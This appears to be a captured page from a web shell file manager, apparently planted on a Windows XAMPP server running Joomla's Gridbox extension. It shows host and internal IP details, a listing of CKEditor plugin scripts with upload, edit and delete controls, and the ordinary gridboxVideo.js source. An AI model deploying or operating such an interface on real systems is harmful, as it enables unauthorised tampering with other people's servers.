[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
components
/
com_gridbox
/
libraries
/
ckeditor
/
js
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 anchor.js
2,216 B
SET
[ EDIT ]
|
[ DEL ]
📄 code.js
2,870 B
SET
[ EDIT ]
|
[ DEL ]
📄 dataTags.js
1,332 B
SET
[ EDIT ]
|
[ DEL ]
📄 gridboxImage.js
793 B
SET
[ EDIT ]
|
[ DEL ]
📄 gridboxPlugins.js
774 B
SET
[ EDIT ]
|
[ DEL ]
📄 gridboxVideo.js
754 B
SET
[ EDIT ]
|
[ DEL ]
📄 image.js
3,048 B
SET
[ EDIT ]
|
[ DEL ]
📄 link.js
2,960 B
SET
[ EDIT ]
|
[ DEL ]
📄 resizeEditor.js
1,301 B
SET
[ EDIT ]
|
[ DEL ]
📄 unlink.js
793 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: gridboxVideo.js
/** * @package Gridbox * @author Balbooa http://www.balbooa.com/ * @copyright Copyright @ Balbooa * @license http://www.gnu.org/licenses/gpl.html GNU/GPL */ CKEDITOR.plugins.add('gridboxVideo', { icons: 'image', init: function(editor){ editor.addCommand('gridboxVideoComand', { exec: function(editor){ app.blogEditor.insertVideo(); } }); editor.ui.addButton('gridboxVideo', { label: "Video", command: 'gridboxVideoComand', toolbar: 'plugins', icon: 'video' }); } }); CKEDITOR.config.extraPlugins = CKEDITOR.config.extraPlugins ? CKEDITOR.config.extraPlugins+',gridboxVideo' : 'gridboxVideo';